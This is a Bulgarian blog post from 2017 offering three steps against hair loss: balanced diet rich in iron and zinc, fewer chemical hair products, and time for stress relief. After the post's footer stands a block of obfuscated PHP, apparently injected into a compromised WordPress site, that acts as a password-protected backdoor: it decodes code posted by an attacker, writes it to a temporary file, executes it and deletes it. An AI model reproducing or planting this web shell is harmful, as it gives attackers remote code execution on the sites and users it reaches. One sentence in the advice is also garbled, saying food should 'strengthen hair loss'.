3- те най- важни стъпки, за да подобрим растежа на косата | Косопад

3- те най- важни стъпки, за да подобрим растежа на косата

kosa

Обикновено хората мислят, че косопадът е изключително мъжки проблем. Но той засяга както мъже, така и жени.

Причинителите му обаче са много разнообразни: генетични, стрес, сезонни промени… Навярно се питате какво трябва да направим, за да имаме здрава и силна коса. За целта, ще ви предложим няколко насоки.
Обикновено в тези случаи се препоръчва да посетите дерматолог. Важно е обаче да обърнете внимание на храненето си.

Известно е, че качеството на кръвта ни, определя нашето здраве. Косата също зависи от нея, защото се храни оттам. Затова, трябва да избираме подходяща храна, която да засили косопада. Важно е обаче да контролираме нивата си на тревожност и нервност. Много често се разболяваме или страдаме на нервна почва.

1. Хранете се, за да засилите растежа на косата

Приготвяне на пълноценни ястия
Какво се има предвид под „пълноценен“? Отнася се за всички хранителни вещества, които помагат за правилното функциониране на организма. Това означава, че ястията, които приготвяте трябва да съдържат:
–протеини: месо, риба и яйца
–въглехидрати: пълнозърнести култури, бобови
–фибри, глюкоза и киселини: плодове и зеленчуци
–здравословни мазнини: ядки, зехтин, авокадо и обезмаслени млечни продукти
Трябва да внимавате за пропорциите. Протеините и зеленчуците трябва да са основните продукти в рецептите. Въглехидратите и глюкозата осигуряват енергията, от която тялото ни се нуждае, за да извършва метаболизма.

kosopad-2
Избирайте съставки, богати желязо и цинк
Желязото има като основна функция да транспортира кислорода из тялото. Можем да си го набавяме от месото, лещата, и пр.
Цинкът е много важен за възстановяване на тъканите. Можем да си го набавяме от чистия шоколад, тиква, тиквички и пр.

2. Избягвайте химикалите в козметиката за коса
Жените обичат да ходят на фризьор, за да освежават външния си вид с нова прическа. Но често тази промяна е свързана с използване на лак, гел и пр. продукти. Също така е важно и как си мием косата. Добре е да не го правим всеки ден. Препоръчва се и да избягваме спането с влажна коса, тъй като по този начин се уврежда скалпа.

3. Отделете време за себе си
Както споменахме по- горе, тревожността и стресът влияят много негативно върху косата. Добре е да отделяте по час и половина всеки ден на любимо занимание. Например – спорт, четене, срещи с приятели. По този начин ще релаксирате.

Тези три стъпки са много важни, за да имаме здрава и красива коса.

09. март 2017 18:25:18 от Надя Колева
Категории: Рецепти при косопад | Етикети: , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}